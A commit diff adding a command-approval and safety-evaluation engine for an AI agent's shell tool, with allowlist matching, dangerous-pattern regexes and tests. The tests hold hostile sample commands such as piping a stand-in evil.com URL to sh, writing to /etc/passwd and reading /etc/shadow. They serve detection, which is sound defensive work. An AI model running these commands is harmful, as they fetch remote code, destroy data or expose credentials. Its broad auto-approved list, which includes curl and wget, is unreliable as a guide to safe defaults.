feat(agent): add exec approval type definitions and safety evaluation engine

Introduces the core exec approval system with: - Type definitions: ExecSecurity, ExecAsk, ApprovalDecision, ExecApprovalConfig - Command safety evaluation: shell syntax analysis, safe binary detection, dangerous pattern detection, allowlist matching - Persistent allowlist management: glob pattern matching, dedup, usage tracking - Comprehensive test coverage (76 tests) Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-02-04 17:06:58 +08:00 · 2026-02-04 17:06:58 +08:00 · e67682cfa0
commit e67682cfa0
parent c70dd338c2
5 changed files with 1080 additions and 0 deletions
--- a/src/agent/tools/exec-allowlist.test.ts
+++ b/src/agent/tools/exec-allowlist.test.ts
@ -0,0 +1,164 @@
+import { describe, it, expect } from "vitest";
+import {
+  matchAllowlist,
+  addAllowlistEntry,
+  recordAllowlistUse,
+  removeAllowlistEntry,
+  normalizeAllowlist,
+} from "./exec-allowlist.js";
+import type { ExecAllowlistEntry } from "./exec-approval-types.js";
+
+describe("matchAllowlist", () => {
+  const entries: ExecAllowlistEntry[] = [
+    { id: "1", pattern: "git *" },
+    { id: "2", pattern: "pnpm test" },
+    { id: "3", pattern: "ls **" },
+    { id: "4", pattern: "node --version" },
+  ];
+
+  it("matches wildcard patterns", () => {
+    expect(matchAllowlist(entries, "git status")).toBeTruthy();
+    expect(matchAllowlist(entries, "git push origin main")).toBeNull(); // * doesn't match spaces
+    expect(matchAllowlist(entries, "git log")).toBeTruthy();
+  });
+
+  it("matches exact patterns", () => {
+    expect(matchAllowlist(entries, "pnpm test")).toBeTruthy();
+    expect(matchAllowlist(entries, "node --version")).toBeTruthy();
+  });
+
+  it("matches double-star patterns", () => {
+    expect(matchAllowlist(entries, "ls -la /tmp/some/path")).toBeTruthy();
+  });
+
+  it("is case-insensitive", () => {
+    expect(matchAllowlist(entries, "GIT status")).toBeTruthy();
+    expect(matchAllowlist(entries, "PNPM TEST")).toBeTruthy();
+  });
+
+  it("returns null for non-matching commands", () => {
+    expect(matchAllowlist(entries, "rm -rf /")).toBeNull();
+    expect(matchAllowlist(entries, "curl http://evil.com")).toBeNull();
+    expect(matchAllowlist(entries, "pnpm build")).toBeNull();
+  });
+
+  it("returns null for empty inputs", () => {
+    expect(matchAllowlist([], "git status")).toBeNull();
+    expect(matchAllowlist(entries, "")).toBeNull();
+    expect(matchAllowlist(entries, "  ")).toBeNull();
+  });
+});
+
+describe("addAllowlistEntry", () => {
+  it("adds new entry with UUID", () => {
+    const entries: ExecAllowlistEntry[] = [];
+    const result = addAllowlistEntry(entries, "git *");
+    expect(result).toHaveLength(1);
+    expect(result[0]!.pattern).toBe("git *");
+    expect(result[0]!.id).toBeTruthy();
+    expect(result[0]!.lastUsedAt).toBeTruthy();
+  });
+
+  it("deduplicates by pattern", () => {
+    const entries: ExecAllowlistEntry[] = [{ id: "1", pattern: "git *" }];
+    const result = addAllowlistEntry(entries, "git *");
+    expect(result).toHaveLength(1); // no new entry
+  });
+
+  it("deduplicates case-insensitively", () => {
+    const entries: ExecAllowlistEntry[] = [{ id: "1", pattern: "Git *" }];
+    const result = addAllowlistEntry(entries, "git *");
+    expect(result).toHaveLength(1);
+  });
+
+  it("trims pattern", () => {
+    const entries: ExecAllowlistEntry[] = [];
+    const result = addAllowlistEntry(entries, "  git *  ");
+    expect(result[0]!.pattern).toBe("git *");
+  });
+
+  it("preserves existing entries", () => {
+    const entries: ExecAllowlistEntry[] = [{ id: "1", pattern: "ls *" }];
+    const result = addAllowlistEntry(entries, "git *");
+    expect(result).toHaveLength(2);
+    expect(result[0]!.pattern).toBe("ls *");
+  });
+});
+
+describe("recordAllowlistUse", () => {
+  it("updates lastUsedAt and lastUsedCommand", () => {
+    const entry: ExecAllowlistEntry = { id: "1", pattern: "git *" };
+    const entries = [entry];
+    const result = recordAllowlistUse(entries, entry, "git status");
+    expect(result[0]!.lastUsedAt).toBeTruthy();
+    expect(result[0]!.lastUsedCommand).toBe("git status");
+  });
+
+  it("matches by ID", () => {
+    const entries: ExecAllowlistEntry[] = [
+      { id: "1", pattern: "git *" },
+      { id: "2", pattern: "ls *" },
+    ];
+    const result = recordAllowlistUse(entries, { id: "2", pattern: "ls *" }, "ls -la");
+    expect(result[0]!.lastUsedCommand).toBeUndefined();
+    expect(result[1]!.lastUsedCommand).toBe("ls -la");
+  });
+
+  it("matches by pattern when no ID", () => {
+    const entries: ExecAllowlistEntry[] = [{ pattern: "git *" }];
+    const result = recordAllowlistUse(entries, { pattern: "git *" }, "git log");
+    expect(result[0]!.lastUsedCommand).toBe("git log");
+  });
+});
+
+describe("removeAllowlistEntry", () => {
+  it("removes by pattern", () => {
+    const entries: ExecAllowlistEntry[] = [
+      { id: "1", pattern: "git *" },
+      { id: "2", pattern: "ls *" },
+    ];
+    const result = removeAllowlistEntry(entries, "git *");
+    expect(result).toHaveLength(1);
+    expect(result[0]!.pattern).toBe("ls *");
+  });
+
+  it("removes by ID", () => {
+    const entries: ExecAllowlistEntry[] = [
+      { id: "1", pattern: "git *" },
+      { id: "2", pattern: "ls *" },
+    ];
+    const result = removeAllowlistEntry(entries, "1");
+    expect(result).toHaveLength(1);
+    expect(result[0]!.id).toBe("2");
+  });
+
+  it("is case-insensitive for patterns", () => {
+    const entries: ExecAllowlistEntry[] = [{ id: "1", pattern: "Git *" }];
+    const result = removeAllowlistEntry(entries, "git *");
+    expect(result).toHaveLength(0);
+  });
+});
+
+describe("normalizeAllowlist", () => {
+  it("assigns IDs to entries without them", () => {
+    const entries: ExecAllowlistEntry[] = [{ pattern: "git *" }];
+    const result = normalizeAllowlist(entries);
+    expect(result[0]!.id).toBeTruthy();
+  });
+
+  it("preserves existing IDs", () => {
+    const entries: ExecAllowlistEntry[] = [{ id: "my-id", pattern: "git *" }];
+    const result = normalizeAllowlist(entries);
+    expect(result[0]!.id).toBe("my-id");
+  });
+
+  it("deduplicates by pattern", () => {
+    const entries: ExecAllowlistEntry[] = [
+      { id: "1", pattern: "git *" },
+      { id: "2", pattern: "Git *" }, // duplicate (case-insensitive)
+    ];
+    const result = normalizeAllowlist(entries);
+    expect(result).toHaveLength(1);
+    expect(result[0]!.id).toBe("1"); // first one wins
+  });
+});
--- a/src/agent/tools/exec-allowlist.ts
+++ b/src/agent/tools/exec-allowlist.ts
@ -0,0 +1,165 @@
+/**
+ * Exec Allowlist — Persistent command pattern matching and management
+ *
+ * Allowlist entries use glob-like patterns to match against commands.
+ * Patterns are matched against the full command string or binary name.
+ */
+
+import { v7 as uuidv7 } from "uuid";
+import type { ExecAllowlistEntry } from "./exec-approval-types.js";
+
+/**
+ * Match a command against allowlist entries.
+ * Returns the first matching entry, or null if no match.
+ *
+ * Matching rules:
+ * - Patterns are case-insensitive
+ * - "*" matches any sequence of non-space characters (within a segment)
+ * - "**" matches any sequence (including spaces)
+ * - Exact match on the full command or command prefix
+ * - Pattern "git *" matches "git status", "git log", etc.
+ */
+export function matchAllowlist(
+  entries: ExecAllowlistEntry[],
+  command: string,
+): ExecAllowlistEntry | null {
+  const normalizedCommand = command.trim().toLowerCase();
+  if (!normalizedCommand) return null;
+
+  for (const entry of entries) {
+    if (matchPattern(entry.pattern, normalizedCommand)) {
+      return entry;
+    }
+  }
+
+  return null;
+}
+
+/**
+ * Match a glob-like pattern against a command string.
+ */
+function matchPattern(pattern: string, command: string): boolean {
+  const normalizedPattern = pattern.trim().toLowerCase();
+  if (!normalizedPattern) return false;
+
+  // Convert glob pattern to regex
+  let regexStr = "^";
+  let i = 0;
+  while (i < normalizedPattern.length) {
+    const ch = normalizedPattern[i]!;
+
+    if (ch === "*") {
+      if (normalizedPattern[i + 1] === "*") {
+        // ** matches anything (including spaces)
+        regexStr += ".*";
+        i += 2;
+      } else {
+        // * matches non-space characters
+        regexStr += "[^\\s]*";
+        i += 1;
+      }
+    } else if (ch === "?") {
+      regexStr += "[^\\s]";
+      i += 1;
+    } else {
+      // Escape regex special characters
+      regexStr += ch.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
+      i += 1;
+    }
+  }
+  regexStr += "$";
+
+  try {
+    return new RegExp(regexStr).test(command);
+  } catch {
+    // Fallback to exact match if regex is invalid
+    return normalizedPattern === command;
+  }
+}
+
+/**
+ * Add an entry to the allowlist.
+ * Deduplicates by pattern (case-insensitive).
+ * Returns the updated entries array.
+ */
+export function addAllowlistEntry(
+  entries: ExecAllowlistEntry[],
+  pattern: string,
+): ExecAllowlistEntry[] {
+  const normalizedPattern = pattern.trim().toLowerCase();
+
+  // Check for duplicate
+  const existing = entries.find(
+    (e) => e.pattern.trim().toLowerCase() === normalizedPattern,
+  );
+  if (existing) return entries;
+
+  const newEntry: ExecAllowlistEntry = {
+    id: uuidv7(),
+    pattern: pattern.trim(),
+    lastUsedAt: Date.now(),
+  };
+
+  return [...entries, newEntry];
+}
+
+/**
+ * Record usage of an allowlist entry.
+ * Updates lastUsedAt and lastUsedCommand.
+ * Returns the updated entries array.
+ */
+export function recordAllowlistUse(
+  entries: ExecAllowlistEntry[],
+  entry: ExecAllowlistEntry,
+  command: string,
+): ExecAllowlistEntry[] {
+  return entries.map((e) => {
+    if (e === entry || (e.id && e.id === entry.id) || e.pattern === entry.pattern) {
+      return {
+        ...e,
+        lastUsedAt: Date.now(),
+        lastUsedCommand: command,
+      };
+    }
+    return e;
+  });
+}
+
+/**
+ * Remove an allowlist entry by pattern or ID.
+ * Returns the updated entries array.
+ */
+export function removeAllowlistEntry(
+  entries: ExecAllowlistEntry[],
+  patternOrId: string,
+): ExecAllowlistEntry[] {
+  const normalized = patternOrId.trim().toLowerCase();
+  return entries.filter(
+    (e) =>
+      e.pattern.trim().toLowerCase() !== normalized &&
+      e.id !== patternOrId,
+  );
+}
+
+/**
+ * Normalize allowlist entries: assign missing IDs, deduplicate.
+ */
+export function normalizeAllowlist(
+  entries: ExecAllowlistEntry[],
+): ExecAllowlistEntry[] {
+  const seen = new Set<string>();
+  const result: ExecAllowlistEntry[] = [];
+
+  for (const entry of entries) {
+    const key = entry.pattern.trim().toLowerCase();
+    if (seen.has(key)) continue;
+    seen.add(key);
+
+    result.push({
+      ...entry,
+      id: entry.id ?? uuidv7(),
+    });
+  }
+
+  return result;
+}
--- a/src/agent/tools/exec-approval-types.ts
+++ b/src/agent/tools/exec-approval-types.ts
@ -0,0 +1,102 @@
+/**
+ * Exec Approval System — Type Definitions
+ *
+ * Human-in-the-loop command execution approval for the exec tool.
+ * Inspired by OpenClaw's defense-in-depth design.
+ */
+
+// ============ Security Policy ============
+
+/** Security level for exec commands */
+export type ExecSecurity = "deny" | "allowlist" | "full";
+
+/** Ask mode — when to request human approval */
+export type ExecAsk = "off" | "on-miss" | "always";
+
+/** User decision for an approval request */
+export type ApprovalDecision = "allow-once" | "allow-always" | "deny";
+
+// ============ Approval Request/Response ============
+
+/** Approval request sent to client (via WebSocket) or shown in CLI */
+export interface ExecApprovalRequest {
+  /** Unique approval ID (UUIDv7) */
+  approvalId: string;
+  /** Agent that initiated the command */
+  agentId: string;
+  /** Shell command to execute */
+  command: string;
+  /** Working directory */
+  cwd?: string;
+  /** Evaluated risk level */
+  riskLevel: "safe" | "needs-review" | "dangerous";
+  /** Reasons for the risk assessment */
+  riskReasons: string[];
+  /** When this approval expires (ms since epoch) */
+  expiresAtMs: number;
+}
+
+/** Result returned after approval decision */
+export interface ApprovalResult {
+  approved: boolean;
+  decision: ApprovalDecision;
+}
+
+// ============ Configuration ============
+
+/** Exec approval configuration (stored in profile config) */
+export interface ExecApprovalConfig {
+  /** Security level: "deny" blocks all, "allowlist" requires matching, "full" allows all */
+  security?: ExecSecurity;
+  /** Ask mode: "off" never asks, "on-miss" asks when allowlist misses, "always" always asks */
+  ask?: ExecAsk;
+  /** Timeout before auto-deny in milliseconds (default: 60_000) */
+  timeoutMs?: number;
+  /** Fallback security level on timeout (default: "deny" — fail-closed) */
+  askFallback?: ExecSecurity;
+  /** Persistent allowlist of approved command patterns */
+  allowlist?: ExecAllowlistEntry[];
+}
+
+/** Default timeout for approval requests (60 seconds) */
+export const DEFAULT_APPROVAL_TIMEOUT_MS = 60_000;
+
+// ============ Allowlist ============
+
+/** A single allowlist entry */
+export interface ExecAllowlistEntry {
+  /** Unique entry ID (auto-generated UUID) */
+  id?: string;
+  /** Glob pattern to match against command binary or full command */
+  pattern: string;
+  /** Last time this entry was used (ms since epoch) */
+  lastUsedAt?: number;
+  /** Last command that matched this entry */
+  lastUsedCommand?: string;
+}
+
+// ============ Callback ============
+
+/**
+ * Callback injected into the exec tool for approval flow.
+ * Abstracts the communication channel (Hub WebSocket vs CLI readline).
+ * Returns a promise that resolves when the user makes a decision.
+ */
+export type ExecApprovalCallback = (
+  command: string,
+  cwd: string | undefined,
+) => Promise<ApprovalResult>;
+
+// ============ Safety Evaluation ============
+
+/** Result of command safety evaluation */
+export interface SafetyEvaluation {
+  /** Overall risk level */
+  riskLevel: "safe" | "needs-review" | "dangerous";
+  /** Reasons explaining the risk assessment */
+  reasons: string[];
+  /** Whether shell syntax analysis passed */
+  analysisOk: boolean;
+  /** Whether the command matched the allowlist */
+  allowlistSatisfied: boolean;
+}
--- a/src/agent/tools/exec-safety.test.ts
+++ b/src/agent/tools/exec-safety.test.ts
@ -0,0 +1,287 @@
+import { describe, it, expect } from "vitest";
+import {
+  evaluateCommandSafety,
+  requiresApproval,
+  minSecurity,
+  maxAsk,
+  extractBinaryName,
+  hasFilePathArgs,
+  isSafeBinUsage,
+  analyzeShellSyntax,
+  detectDangerousPatterns,
+  DEFAULT_SAFE_BINS,
+} from "./exec-safety.js";
+
+describe("extractBinaryName", () => {
+  it("extracts simple binary names", () => {
+    expect(extractBinaryName("ls")).toBe("ls");
+    expect(extractBinaryName("git status")).toBe("git");
+    expect(extractBinaryName("  node --version  ")).toBe("node");
+  });
+
+  it("extracts binary from absolute path", () => {
+    expect(extractBinaryName("/usr/bin/git status")).toBe("git");
+    expect(extractBinaryName("/usr/local/bin/node")).toBe("node");
+  });
+
+  it("handles env prefix", () => {
+    expect(extractBinaryName("env FOO=bar git status")).toBe("git");
+    expect(extractBinaryName("env NODE_ENV=test node app.js")).toBe("node");
+  });
+
+  it("extracts first command in pipe", () => {
+    expect(extractBinaryName("grep pattern | head -5")).toBe("grep");
+    expect(extractBinaryName("cat | sort | uniq")).toBe("cat");
+  });
+
+  it("returns null for empty command", () => {
+    expect(extractBinaryName("")).toBeNull();
+    expect(extractBinaryName("  ")).toBeNull();
+  });
+});
+
+describe("hasFilePathArgs", () => {
+  it("detects absolute paths", () => {
+    expect(hasFilePathArgs("cat /etc/passwd")).toBe(true);
+    expect(hasFilePathArgs("rm /tmp/file")).toBe(true);
+  });
+
+  it("detects relative paths", () => {
+    expect(hasFilePathArgs("cat ./file")).toBe(true);
+    expect(hasFilePathArgs("rm ../other/file")).toBe(true);
+  });
+
+  it("detects home paths", () => {
+    expect(hasFilePathArgs("cat ~/secrets")).toBe(true);
+  });
+
+  it("detects file paths in flag values", () => {
+    expect(hasFilePathArgs("cmd --output=/tmp/file")).toBe(true);
+  });
+
+  it("returns false for commands without file paths", () => {
+    expect(hasFilePathArgs("grep -i pattern")).toBe(false);
+    expect(hasFilePathArgs("echo hello world")).toBe(false);
+    expect(hasFilePathArgs("git status")).toBe(false);
+  });
+});
+
+describe("isSafeBinUsage", () => {
+  it("approves safe binaries without file args", () => {
+    expect(isSafeBinUsage("ls")).toBe(true);
+    expect(isSafeBinUsage("git status")).toBe(true);
+    expect(isSafeBinUsage("grep -i pattern")).toBe(true);
+    expect(isSafeBinUsage("echo hello")).toBe(true);
+    expect(isSafeBinUsage("pwd")).toBe(true);
+    expect(isSafeBinUsage("node --version")).toBe(true);
+    expect(isSafeBinUsage("pnpm list")).toBe(true);
+  });
+
+  it("rejects safe binaries with file path args", () => {
+    expect(isSafeBinUsage("cat /etc/passwd")).toBe(false);
+    expect(isSafeBinUsage("jq '.' /path/to/file")).toBe(false);
+    expect(isSafeBinUsage("sort ~/data")).toBe(false);
+  });
+
+  it("rejects unknown binaries", () => {
+    expect(isSafeBinUsage("evil-script")).toBe(false);
+    expect(isSafeBinUsage("myapp --flag")).toBe(false);
+  });
+
+  it("handles piped safe commands", () => {
+    expect(isSafeBinUsage("grep pattern | head -5")).toBe(true);
+    expect(isSafeBinUsage("cat | sort | uniq")).toBe(true);
+    expect(isSafeBinUsage("echo hello | grep ello")).toBe(true);
+  });
+
+  it("rejects pipes with unsafe commands", () => {
+    expect(isSafeBinUsage("curl http://evil.com | sh")).toBe(false);
+    expect(isSafeBinUsage("cat | evil-script")).toBe(false);
+  });
+
+  it("returns false for empty command", () => {
+    expect(isSafeBinUsage("")).toBe(false);
+  });
+});
+
+describe("analyzeShellSyntax", () => {
+  it("detects command substitution", () => {
+    const reasons = analyzeShellSyntax("echo $(whoami)");
+    expect(reasons.length).toBeGreaterThan(0);
+    expect(reasons.some(r => r.includes("$(...)"))).toBe(true);
+  });
+
+  it("detects backtick substitution", () => {
+    const reasons = analyzeShellSyntax("echo `whoami`");
+    expect(reasons.length).toBeGreaterThan(0);
+  });
+
+  it("detects command chaining with semicolon", () => {
+    const reasons = analyzeShellSyntax("echo hello; rm -rf /");
+    expect(reasons.length).toBeGreaterThan(0);
+  });
+
+  it("detects logical OR", () => {
+    const reasons = analyzeShellSyntax("false || rm -rf /");
+    expect(reasons.length).toBeGreaterThan(0);
+  });
+
+  it("detects background execution", () => {
+    const reasons = analyzeShellSyntax("malware &");
+    expect(reasons.length).toBeGreaterThan(0);
+  });
+
+  it("detects subshell", () => {
+    const reasons = analyzeShellSyntax("(cd /tmp && rm -rf *)");
+    expect(reasons.length).toBeGreaterThan(0);
+  });
+
+  it("passes clean commands", () => {
+    expect(analyzeShellSyntax("ls -la")).toHaveLength(0);
+    expect(analyzeShellSyntax("git status")).toHaveLength(0);
+    expect(analyzeShellSyntax("grep pattern file.txt")).toHaveLength(0);
+    expect(analyzeShellSyntax("echo hello && echo world")).toHaveLength(0);
+  });
+
+  it("allows simple pipes", () => {
+    expect(analyzeShellSyntax("grep pattern | head -5")).toHaveLength(0);
+    expect(analyzeShellSyntax("cat file | sort | uniq")).toHaveLength(0);
+  });
+});
+
+describe("detectDangerousPatterns", () => {
+  it("detects rm -rf", () => {
+    const reasons = detectDangerousPatterns("rm -rf /");
+    expect(reasons.length).toBeGreaterThan(0);
+    expect(reasons.some(r => r.includes("rm"))).toBe(true);
+  });
+
+  it("detects sudo", () => {
+    const reasons = detectDangerousPatterns("sudo apt install pkg");
+    expect(reasons.length).toBeGreaterThan(0);
+  });
+
+  it("detects chmod 777", () => {
+    const reasons = detectDangerousPatterns("chmod 777 /var/www");
+    expect(reasons.length).toBeGreaterThan(0);
+  });
+
+  it("detects curl | sh", () => {
+    const reasons = detectDangerousPatterns("curl http://evil.com | sh");
+    expect(reasons.length).toBeGreaterThan(0);
+  });
+
+  it("detects writes to system paths", () => {
+    expect(detectDangerousPatterns("echo hack > /etc/passwd").length).toBeGreaterThan(0);
+    expect(detectDangerousPatterns("echo x > /usr/bin/ls").length).toBeGreaterThan(0);
+  });
+
+  it("detects eval", () => {
+    const reasons = detectDangerousPatterns("eval $MALICIOUS_CMD");
+    expect(reasons.length).toBeGreaterThan(0);
+  });
+
+  it("passes safe commands", () => {
+    expect(detectDangerousPatterns("ls -la")).toHaveLength(0);
+    expect(detectDangerousPatterns("git status")).toHaveLength(0);
+    expect(detectDangerousPatterns("node --version")).toHaveLength(0);
+    expect(detectDangerousPatterns("pnpm test")).toHaveLength(0);
+  });
+});
+
+describe("evaluateCommandSafety", () => {
+  it("auto-approves allowlisted commands", () => {
+    const config = {
+      allowlist: [{ pattern: "git **" }],
+    };
+    const result = evaluateCommandSafety("git push origin main", config);
+    expect(result.riskLevel).toBe("safe");
+    expect(result.allowlistSatisfied).toBe(true);
+  });
+
+  it("auto-approves safe binary usage", () => {
+    const result = evaluateCommandSafety("ls -la");
+    expect(result.riskLevel).toBe("safe");
+    expect(result.analysisOk).toBe(true);
+  });
+
+  it("flags dangerous commands", () => {
+    const result = evaluateCommandSafety("rm -rf /");
+    expect(result.riskLevel).toBe("dangerous");
+    expect(result.reasons.length).toBeGreaterThan(0);
+  });
+
+  it("flags dangerous shell syntax", () => {
+    const result = evaluateCommandSafety("echo $(cat /etc/shadow)");
+    expect(result.riskLevel).toBe("dangerous");
+    expect(result.analysisOk).toBe(false);
+  });
+
+  it("flags unknown commands as needs-review", () => {
+    const result = evaluateCommandSafety("my-custom-script --flag");
+    expect(result.riskLevel).toBe("needs-review");
+    expect(result.analysisOk).toBe(true);
+    expect(result.allowlistSatisfied).toBe(false);
+  });
+
+  it("flags safe binary with file args as needs-review", () => {
+    const result = evaluateCommandSafety("cat /etc/passwd");
+    expect(result.riskLevel).toBe("needs-review");
+  });
+});
+
+describe("requiresApproval", () => {
+  it("always requires when ask is 'always'", () => {
+    expect(requiresApproval({
+      ask: "always", security: "full", analysisOk: true, allowlistSatisfied: true,
+    })).toBe(true);
+  });
+
+  it("never requires when ask is 'off'", () => {
+    expect(requiresApproval({
+      ask: "off", security: "allowlist", analysisOk: false, allowlistSatisfied: false,
+    })).toBe(false);
+  });
+
+  it("requires on allowlist miss with on-miss", () => {
+    expect(requiresApproval({
+      ask: "on-miss", security: "allowlist", analysisOk: true, allowlistSatisfied: false,
+    })).toBe(true);
+  });
+
+  it("requires on analysis failure with on-miss", () => {
+    expect(requiresApproval({
+      ask: "on-miss", security: "allowlist", analysisOk: false, allowlistSatisfied: true,
+    })).toBe(true);
+  });
+
+  it("does not require when allowlist satisfied with on-miss", () => {
+    expect(requiresApproval({
+      ask: "on-miss", security: "allowlist", analysisOk: true, allowlistSatisfied: true,
+    })).toBe(false);
+  });
+
+  it("does not require with on-miss when security is full", () => {
+    expect(requiresApproval({
+      ask: "on-miss", security: "full", analysisOk: false, allowlistSatisfied: false,
+    })).toBe(false);
+  });
+});
+
+describe("minSecurity", () => {
+  it("returns stricter security", () => {
+    expect(minSecurity("deny", "full")).toBe("deny");
+    expect(minSecurity("allowlist", "full")).toBe("allowlist");
+    expect(minSecurity("full", "deny")).toBe("deny");
+    expect(minSecurity("allowlist", "allowlist")).toBe("allowlist");
+  });
+});
+
+describe("maxAsk", () => {
+  it("returns more frequent ask mode", () => {
+    expect(maxAsk("off", "always")).toBe("always");
+    expect(maxAsk("on-miss", "always")).toBe("always");
+    expect(maxAsk("off", "on-miss")).toBe("on-miss");
+    expect(maxAsk("on-miss", "on-miss")).toBe("on-miss");
+  });
+});
--- a/src/agent/tools/exec-safety.ts
+++ b/src/agent/tools/exec-safety.ts
@ -0,0 +1,362 @@
+/**
+ * Exec Safety Evaluation Engine
+ *
+ * Evaluates shell commands for safety using layered checks:
+ * 1. Allowlist matching
+ * 2. Shell syntax analysis (dangerous syntax detection)
+ * 3. Safe binary detection
+ * 4. Dangerous pattern detection
+ */
+
+import type {
+  ExecSecurity,
+  ExecAsk,
+  ExecApprovalConfig,
+  ExecAllowlistEntry,
+  SafetyEvaluation,
+} from "./exec-approval-types.js";
+import { matchAllowlist } from "./exec-allowlist.js";
+
+// ============ Safe Binaries ============
+
+/** Known-safe read-only binaries that can auto-approve */
+export const DEFAULT_SAFE_BINS = new Set([
+  "ls", "cat", "head", "tail", "wc", "grep", "egrep", "fgrep",
+  "sort", "uniq", "cut", "tr", "jq", "yq",
+  "echo", "printf", "pwd", "which", "whereis", "whoami",
+  "env", "date", "uname", "hostname",
+  "file", "stat", "basename", "dirname", "realpath",
+  "diff", "comm", "tee",
+  "find", "xargs",
+  "git", "node", "pnpm", "npm", "npx", "yarn", "bun",
+  "python", "python3", "pip", "pip3",
+  "go", "cargo", "rustc",
+  "docker", "kubectl",
+  "curl", "wget",
+  "tar", "gzip", "gunzip", "zip", "unzip",
+  "sed", "awk", "rg", "fd", "ag",
+  "tree", "less", "more",
+  "true", "false", "test",
+  "mkdir", "touch", "cp", "mv", "ln",
+]);
+
+// ============ Dangerous Patterns ============
+
+/** Patterns indicating dangerous operations */
+const DANGEROUS_PATTERNS: Array<{ regex: RegExp; reason: string }> = [
+  { regex: /\brm\s+(-[^\s]*r[^\s]*|--recursive)\s/i, reason: "Recursive delete (rm -r)" },
+  { regex: /\brm\s+(-[^\s]*f[^\s]*)\s/i, reason: "Force delete (rm -f)" },
+  { regex: /\bsudo\b/, reason: "Elevated privileges (sudo)" },
+  { regex: /\bsu\s/, reason: "Switch user (su)" },
+  { regex: /\bchmod\s+777\b/, reason: "World-writable permissions (chmod 777)" },
+  { regex: /\bchmod\s+-[^\s]*R/, reason: "Recursive permission change (chmod -R)" },
+  { regex: /\bchown\s+-[^\s]*R/, reason: "Recursive ownership change (chown -R)" },
+  { regex: /\bmkfs\b/, reason: "Filesystem format (mkfs)" },
+  { regex: /\bdd\s/, reason: "Low-level disk write (dd)" },
+  { regex: /\beval\s/, reason: "Dynamic code evaluation (eval)" },
+  { regex: /\bexec\s/, reason: "Process replacement (exec)" },
+  { regex: />\s*\/etc\//, reason: "Write to /etc/" },
+  { regex: />\s*\/usr\//, reason: "Write to /usr/" },
+  { regex: />\s*\/sys\//, reason: "Write to /sys/" },
+  { regex: />\s*\/proc\//, reason: "Write to /proc/" },
+  { regex: />\s*\/dev\//, reason: "Write to /dev/" },
+  { regex: /\bcurl\b.*\|\s*(ba)?sh/, reason: "Pipe URL to shell (curl | sh)" },
+  { regex: /\bwget\b.*\|\s*(ba)?sh/, reason: "Pipe URL to shell (wget | sh)" },
+  { regex: /\b(shutdown|reboot|halt|poweroff)\b/, reason: "System control command" },
+  { regex: /\bkill\s+-9\b/, reason: "Force kill (kill -9)" },
+  { regex: /\bkillall\b/, reason: "Kill all processes (killall)" },
+  { regex: /\bpkill\b/, reason: "Pattern kill (pkill)" },
+  { regex: />\s*\/dev\/sd[a-z]/, reason: "Direct disk write" },
+  { regex: /\biptables\b/, reason: "Firewall modification (iptables)" },
+  { regex: /\bufw\b/, reason: "Firewall modification (ufw)" },
+];
+
+// ============ Dangerous Shell Syntax ============
+
+/** Shell syntax patterns that are inherently dangerous */
+const DANGEROUS_SYNTAX: Array<{ regex: RegExp; reason: string }> = [
+  { regex: /\|&/, reason: "Stderr redirect to pipe (|&)" },
+  { regex: /\|\|/, reason: "Logical OR (||) — fallback execution" },
+  { regex: /(?<!\|)\|(?!\|).*\b(ba)?sh\b/, reason: "Pipe to shell interpreter" },
+  { regex: /[^\\]`[^`]+`/, reason: "Command substitution (backticks)" },
+  { regex: /\$\(/, reason: "Command substitution $(...)" },
+  { regex: /(?<![&])&(?!&)\s*$/, reason: "Background execution (&)" },
+  { regex: /(?<![&])&(?!&)(?!\s*$)/, reason: "Background execution (&)" },
+  { regex: /;\s*\S/, reason: "Command chaining (;)" },
+  { regex: /\(\s*\S/, reason: "Subshell execution ()" },
+];
+
+// ============ Core Functions ============
+
+/**
+ * Extract the leading binary name from a shell command.
+ * Handles common patterns: env prefix, path prefix.
+ */
+export function extractBinaryName(command: string): string | null {
+  const trimmed = command.trim();
+  if (!trimmed) return null;
+
+  // Skip env prefix: "env FOO=bar cmd" → "cmd"
+  let cmd = trimmed;
+  if (cmd.startsWith("env ")) {
+    const parts = cmd.split(/\s+/);
+    // Skip "env" and any VAR=VAL assignments
+    let i = 1;
+    while (i < parts.length && parts[i]!.includes("=")) i++;
+    cmd = parts.slice(i).join(" ");
+  }
+
+  // For piped commands, only check the first command
+  const firstCmd = cmd.split(/\s*\|\s*/)[0]!.trim();
+
+  // Extract just the binary (strip path prefix)
+  const binary = firstCmd.split(/\s+/)[0];
+  if (!binary) return null;
+
+  // Get basename
+  const parts = binary.split("/");
+  return parts[parts.length - 1] || null;
+}
+
+/**
+ * Check if a command has file-path arguments.
+ * Safe binaries should not have file-path args to be auto-approved.
+ */
+export function hasFilePathArgs(command: string): boolean {
+  const parts = command.trim().split(/\s+/).slice(1); // skip binary
+
+  for (const part of parts) {
+    // Skip flags
+    if (part.startsWith("-")) {
+      // Check if flag value is a file path (e.g., --output=/tmp/file)
+      const eqIndex = part.indexOf("=");
+      if (eqIndex !== -1) {
+        const value = part.slice(eqIndex + 1);
+        if (isFilePath(value)) return true;
+      }
+      continue;
+    }
+    if (isFilePath(part)) return true;
+  }
+  return false;
+}
+
+function isFilePath(s: string): boolean {
+  return s.startsWith("/") || s.startsWith("./") || s.startsWith("../") || s.startsWith("~/") || /^[A-Za-z]:\\/.test(s);
+}
+
+/**
+ * Check if a command uses only safe binaries in a safe manner.
+ * For piped commands, all components must be safe.
+ */
+export function isSafeBinUsage(command: string, safeBins: Set<string> = DEFAULT_SAFE_BINS): boolean {
+  const trimmed = command.trim();
+  if (!trimmed) return false;
+
+  // For piped commands, check each segment
+  const segments = splitPipeSegments(trimmed);
+  if (!segments) return false; // parsing failed
+
+  for (const segment of segments) {
+    const binary = extractBinaryName(segment);
+    if (!binary) return false;
+
+    // Check if binary is in safe list (case-insensitive)
+    if (!safeBins.has(binary.toLowerCase())) return false;
+
+    // Safe bins should not reference file paths as arguments
+    if (hasFilePathArgs(segment)) return false;
+  }
+
+  return true;
+}
+
+/**
+ * Split command into pipe segments.
+ * Returns null if dangerous syntax is detected in the pipe chain.
+ */
+function splitPipeSegments(command: string): string[] | null {
+  // Simple split on single pipes (not |& or ||)
+  const parts: string[] = [];
+  let current = "";
+  let inSingleQuote = false;
+  let inDoubleQuote = false;
+  let escaped = false;
+
+  for (let i = 0; i < command.length; i++) {
+    const ch = command[i]!;
+
+    if (escaped) {
+      current += ch;
+      escaped = false;
+      continue;
+    }
+
+    if (ch === "\\") {
+      current += ch;
+      escaped = true;
+      continue;
+    }
+
+    if (ch === "'" && !inDoubleQuote) {
+      inSingleQuote = !inSingleQuote;
+      current += ch;
+      continue;
